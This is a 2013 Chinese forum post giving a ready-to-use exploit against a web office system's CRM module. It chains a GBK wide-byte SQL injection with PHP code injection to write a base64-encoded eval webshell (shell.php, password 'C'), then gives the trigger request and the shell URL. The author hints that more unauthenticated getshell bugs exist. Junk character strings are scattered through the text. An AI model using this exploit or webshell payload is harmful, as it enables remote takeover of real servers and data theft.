此程序通篇的gbk编码是他的硬伤, 基本上80%的SQL语句都能控制, 但是由于在进入数据库的时候检测了select和union, 而且此程序加密方式也很蛋疼, 所以注入方面就不考虑了.
1 c- `2 r6 o T' P: w8 l* c* p% X$ x8 E6 _0 Y8 ^6 p
/ }" h$ I- }4 d" QEXP:
( C9 @7 I: _1 H( f% J D- @ & i* A+ u. {! s# w
第一步: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}3 s- @+ n2 p R0 {' M
z5 z% Q: e, x! g0 h第二步: [GET]http://site/general/email/index.php
0 @$ z- {( K3 C) ~6 s 5 T+ [) o3 Q8 N5 ~0 x4 k
SHELL: http://site/general/email/shell.php 密码C
( M; z; A/ a4 e% P 3 f) ~: Z1 B# F9 X, w; X
{( N- }! r. j, k( d2 E/ h0 u4 P( \
此程序写的非常乱, 不知道是因为解密后的原因还是程序员本身就这样写的, 还有几处不需要登录的通杀getshell, 这里就不发了, 危害大了不好
, v$ X! g4 _& S: Q5 P
( |8 w, M+ }8 A4 a: x) I有心的同学可以自己读读, 很容易就发现的 o(∩_∩)o ~~
4 N3 Q: ^ D, |9 L$ r
( R0 n4 |& k4 d2 L# q' t5 \/ C- ~) A, m! h4 `1 V
|
发表于 2013-2-4 16:19:29
收藏
支持
反对